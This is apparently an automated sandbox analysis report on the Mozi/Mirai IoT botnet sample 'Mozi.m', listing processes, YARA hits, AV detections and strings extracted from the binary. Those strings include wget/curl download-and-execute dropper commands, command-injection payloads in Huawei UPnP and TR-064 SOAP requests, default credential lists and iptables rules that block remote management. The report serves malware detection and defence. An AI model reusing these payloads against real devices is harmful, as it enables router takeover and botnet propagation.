    • gzip (PID: 3976, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3979, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
  • dash New Fork (PID: 4018, Parent: 2079)
  • rm (PID: 4018, Parent: 2079, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f /tmp/tmp.vHWsTctARt
  • upstart New Fork (PID: 4504, Parent: 2015)
  • sh (PID: 4504, Parent: 2015, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4513, Parent: 4504)
    • date (PID: 4513, Parent: 4504, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4515, Parent: 4504)
    • apport-checkreports (PID: 4515, Parent: 4504, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4531, Parent: 2015)
  • sh (PID: 4531, Parent: 2015, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4535, Parent: 4531)
    • date (PID: 4535, Parent: 4531, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4541, Parent: 4531)
    • apport-gtk (PID: 4541, Parent: 4531, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4558, Parent: 2015)
  • sh (PID: 4558, Parent: 2015, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4561, Parent: 4558)
    • date (PID: 4561, Parent: 4558, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4568, Parent: 4558)
    • apport-gtk (PID: 4568, Parent: 4558, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Mozi.mSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.mJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    Mozi.mJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      Mozi.mJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
        • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
        /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: Mozi.mAvira: detected
              Antivirus detection for dropped fileShow sources
              Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
              Multi AV Scanner detection for submitted fileShow sources
              Source: Mozi.mVirustotal: Detection: 70%Perma Link
              Source: Mozi.mReversingLabs: Detection: 62%

              Spreading:

              barindex
              Found strings indicative of a multi-platform dropperShow sources
              Source: Mozi.mString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Mozi.mString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Mozi.mString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Opens /proc/net/* files useful for finding connected devices and routersShow sources
              Source: /tmp/Mozi.m (PID: 3515)Opens: /proc/net/route
              Source: /tmp/Mozi.m (PID: 3515)Opens: /proc/net/route

              Networking:

              barindex
              Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
              Source: /bin/sh (PID: 3690)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3725)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3739)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3772)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3783)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3808)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3813)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3822)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 4029)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4032)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4036)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4055)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4107)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4137)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4162)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4180)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4199)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 4216)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 4239)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 4251)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 4275)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 4285)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 4314)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 4328)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 4353)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4364)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4390)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4408)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4429)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4440)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4467)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4478)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
              Source: /bin/sh (PID: 3690)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3725)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3739)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3772)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3783)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3808)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3813)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3822)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 4029)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4032)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4036)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4055)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4107)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4137)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4162)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4180)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4199)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 4216)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 4239)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 4251)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 4275)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 4285)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 4314)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 4328)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 4353)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4364)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4390)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4408)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4429)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4440)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4467)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4478)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
              Source: /tmp/Mozi.m (PID: 3515)Socket: 0.0.0.0::51746
              Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;chmod
              Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;sh$
              Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m
              Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;
              Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;$
              Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
              Source: Mozi.mString found in binary or memory: http://%s:%d/bin.sh
              Source: Mozi.mString found in binary or memory: http://%s:%d/bin.sh;chmod
              Source: Mozi.mString found in binary or memory: http://127.0.0.1
              Source: Mozi.mString found in binary or memory: http://127.0.0.1sendcmd
              Source: Mozi.mString found in binary or memory: http://HTTP/1.1
              Source: Mozi.mString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
              Source: .config.66.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
              Source: Mozi.mString found in binary or memory: http://ipinfo.io/ip
              Source: alsa-info.sh0.66.drString found in binary or memory: http://pastebin.ca)
              Source: alsa-info.sh0.66.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
              Source: alsa-info.sh0.66.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
              Source: Mozi.mString found in binary or memory: http://purenetworks.com/HNAP1/
              Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
              Source: alsa-info.sh0.66.drString found in binary or memory: http://www.alsa-project.org
              Source: alsa-info.sh0.66.drString found in binary or memory: http://www.alsa-project.org.
              Source: alsa-info.sh0.66.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
              Source: alsa-info.sh0.66.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
              Source: alsa-info.sh0.66.drString found in binary or memory: http://www.pastebin.ca
              Source: alsa-info.sh0.66.drString found in binary or memory: http://www.pastebin.ca.
              Source: alsa-info.sh0.66.drString found in binary or memory: http://www.pastebin.ca/upload.php
              Source: /tmp/Mozi.m (PID: 3492)HTML file containing JavaScript created: /usr/networksJump to dropped file
              Source: Initial sampleString containing 'busybox' found: busybox
              Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
              Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
              Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
              Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
              Source: Initial sampleString containing potential weak password found: admin
              Source: Initial sampleString containing potential weak password found: default
              Source: Initial sampleString containing potential weak password found: support
              Source: Initial sampleString containing potential weak password found: service
              Source: Initial sampleString containing potential weak password found: supervisor
              Source: Initial sampleString containing potential weak password found: guest
              Source: Initial sampleString containing potential weak password found: administrator
              Source: Initial sampleString containing potential weak password found: 123456
              Source: Initial sampleString containing potential weak password found: 54321
              Source: Initial sampleString containing potential weak password found: password
              Source: Initial sampleString containing potential weak password found: 12345
              Source: Initial sampleString containing potential weak password found: admin1234
              Source: Initial samplePotential command found: POST /cdn-cgi/
              Source: Initial samplePotential command found: GET /c HTTP/1.0
              Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
              Source: Initial samplePotential command found: GET %s HTTP/1.1
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
              Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
              Source: Initial samplePotential command found: mount -o remount,rw /overlay /
              Source: Initial samplePotential command found: mv -f %s %s
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: GET /c
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: killall -9 %s
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
              Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
              Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
